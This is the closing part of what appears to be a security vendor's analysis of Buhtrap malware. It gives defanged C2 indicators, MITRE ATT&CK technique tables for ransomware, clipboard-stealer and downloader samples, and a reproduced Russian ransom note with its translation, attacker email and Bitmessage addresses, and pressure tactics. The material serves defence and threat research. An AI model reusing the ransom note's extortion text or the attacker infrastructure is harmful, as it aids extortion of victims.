
185.248.103[.]74

Win32/Buhtrap

Medialeaks[.]icu

185.248.103[.]74

Win32/Buhtrap

icq.chatovod[.]info

185.142.236[.]220

Win32/Buhtrap

womens-history[.]me

185.142.236[.]242

Win32/Buhtrap

MITRE ATT&CK

Win32/Filecoder.Buhtrap

Tactic

Name

Description

Execution

T1204

User execution

The user must run the executable

Defense evasion

T1116

Code signing

Some of the samples are signed

T1140

Deobfuscate/Decode Files or Information

The strings are encrypted using RC4

Discovery

T1083

File and Directory Discovery

Files and Directories are discovered for encryption

T1135

Network Share Discovery

The network shares are discovered to find more files to encrypt

Win32/ClipBanker

Tactic

Name

Description

Execution

T1204

User execution

The user must run the executable

Defense evasion

T1116

Code signing

Some of the samples are signed

T1140

Deobfuscate/Decode Files or Information

The cryptocurrency addresses are encrypted using RC4

MSIL/ClipBanker

Tactic

Name

Description

Execution

T1204

User execution

The user must run the executable

Persistence

T1004

Winlogon Helper DLL

Persistence is achieved by altering the Winlogon\shell key

Defense evasion

T1116

Code signing

Some of the samples are signed

T1140

Deobfuscate/Decode Files or Information

The strings are encrypted using a static XOR key

T1158

Hidden Files and Directories

The executable used for persistence is in a newly created hidden directory

Discovery

T1083

File and Directory Discovery

Look for specific folders to find wallet application storage

Collection

T1115

Clipboard Data

Bitcoin WIF private key is stolen from the clipboard data

Exfiltration

T1020

Automated Exfiltration

Crypto wallet software’s storage is automatically exfiltrated

T1041

Exfiltration Over Command and Control Channel

Exfiltrated data is sent to a server

Command and Control

T1102

Web Service

Uses IP Logger legitimate service to exfiltrate Bitcoin WIF private keys

T1043

Commonly Used Port

Communicates with a server using HTTPS

T1071

Standard Application Layer Protocol

Communicates with a server using HTTPS

Buhtrap downloader

Tactic

Name

Description

Execution

T1204

User execution

The user must run the executable

T1106

Execution through API

Executes additional malware through CreateProcess

Defense evasion

T1116

Code signing

Some of the samples are signed

Credential Access

T1056

Input Capture

Backdoor contains a keylogger

T1111

Two-Factor Authentication Interception

Backdoor actively searches for a connected smart card

Collection

T1115

Clipboard Data

Backdoor logs clipboard content

Exfiltration

T1020

Automated Exfiltration

Log files are automatically exfiltrated

T1022

Data Encrypted

Data sent to C&C is encrypted

T1041

Exfiltration Over Command and Control Channel

Exfiltrated data is sent to a server

T1043

Commonly Used Port

Communicates with a server using HTTPS

Command and Control

T1071

Standard Application Layer Protocol

HTTPS is used

T1105

Remote File Copy

Backdoor can download and execute file from C&C server

Appendix A: Example of a ransom note

Original version

ВНИМАНИЕ, ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ!

Ваши документы, фотографии, базы данных, сохранения в играх и другие

важные данные были зашифрованы уникальным ключем, который находится

только у нас. Для восстановления данных необходим дешифровщик.

Восстановить файлы Вы можете, написав нам на почту:

e-mail: sprosinas@cock.li

e-mail: sprosinas2@protonmail.com

Пришлите Ваш идентификатор TOKEN и 1-2 файла, размером до 1 Мб каждый.

Мы их восстановим, в доказательство возможности расшифровки.

После демонстрации вы получите инструкцию по оплате, а после оплаты

Вам будет отправлена программа-дешифратор, которая полностью восстановит

все заблокированные файлы без потерь.

Если связаться через почту не получается:

Перейдите по ссылке: bitmessage.org/wiki/Main_Page и скачайте

почтовый клиент. Установите почтовый клиент и создайте себе новый адрес

для отправки сообщений.

Напишите нам письмо на адрес: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG

(с указанием Вашей почты) и мы свяжемся с Вами.

ВАЖНО!

Расшифровка гарантируется, если Вы свяжетесь с нами в течении 72 часов.

Выключение или перезагрузка компьютера может привести к потере Ваших файлов.

Не пытайтесь удалить программу или запускать антивирусные средства.

Попытки самостоятельной расшифровки файлов приведут к потере Ваших данных.

Дешифраторы других пользователей несовместимы с Вашими данными,

так как у каждого пользователя уникальный ключ шифрования.

Убедительная просьба писать людям, которые действительно заинтересованы

в восстановлении файлов. Не следует угрожать и требовать дешифратор.

Жалобами заблокировав e-mail, Вы лишаете возможности расшифровать свои

файлы остальных.

-----BEGIN TOKEN-----

dgQAAAAAAAC8+WfVlVPRbtowFH2PlH+4L5uoBFbsxEngrQVKWUe7NdDtYS8eMdRa

iJGdwCb143cdUlG6qtt4sIjv8fG95xz73m028D3fm6ml0VavKviiylzvLSTwyeiV

tFbpUhQAu5hQksQBdfCRqOQAWED7PdajuDVXG9ygUY+yXhQ1EKN20jbk2VYsJahy

pWGlDeSuAkMswcLKHJryAPBH+91+FHXDOIDrC/zu8IiE/N0ZIi+NlM+RcTfhrJuw

qEVGnMQNcq4rbPfIGcbduJ90g9Qhm25wyr0wsmntg9iJznx2BjEstjlOBYzCI9wa

sSwk/sGpA8JocECiKC0q4ieoBFERf0Klr6GG2my1ERXK6XjTpxN/Kp+Nrhud7pWt

3ShVnSuNYgcpjH9uDVoCc60L24DQrpAh4ZHmxUXONs7SlNAkcE6d5/q7hDspcmng

6xQ6lGIrAT9DkkMt+2UrubEwLZdtz2gSttwCfe9SGJiJUqyRwd09rteyRE5tH7Df

9+DqE6PrrTvFkJ2mQeJ7E63XKGqr4JUstnj+EdptvI00t5CQMEZC37sfwl1dVpgs

C7NsejIkAvsHZxh7nt5Wswth1fJUsnGuGu17ML5ZvCXYq7yZKnbSFGr9UL11lqPY

LOjTkGAWjpZknz9CJg0ywFBvMO4VhITDSFq1Llsz/9IV4gkPU4zjPxD/B5d7AHBe

V7r1xTnSpv9FkBhJMeOEcvdubmS11+YHoOMYSBBlDoVeovvN4z48++HgG2bFLRO3

XLll6pbf

-----END TOKEN-----

Translated version

ATTENTION, YOUR FILES ARE ENCRYPTED!

Your documents, photos, databases, saved games and other

important data has been encrypted with a unique key that is in our possession. For data recovery, a decryptor is required.

You can restore files by emailing us:

e-mail: sprosinas@cock.li

e-mail: sprosinas2@protonmail.com

Send your TOKEN ID and 1-2 files, up to 1 MB each.

We will restore them, to prove the possibility of decoding.

After the demonstration, you will receive instructions for payment, and after payment

You will be sent a decryptor program that will fully restore

all locked files without loss.

If you cannot contact via mail:

Follow the link: bitmessage.org/wiki/Main_Page and download

mail client. Install the email client and create yourself a new address.

to send messages.

Write us a letter to the address: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG

(with your mail) and we will contact you.

IMPORTANT!

Decryption is guaranteed if you contact us within 72 hours.

Turning off or restarting your computer can result in the loss of your files.

Do not attempt to uninstall the program or run anti-virus tools.

Attempts to self-decrypt files will lead to the loss of your data.

Other users' decoders are incompatible with your data,

since each user has a unique encryption key.

Please write to people who are really interested in recovering your files. You should not threaten us and demand the decoder.

Complaints blocking e-mail, you would lose the opportunity to decrypt your remaining

files.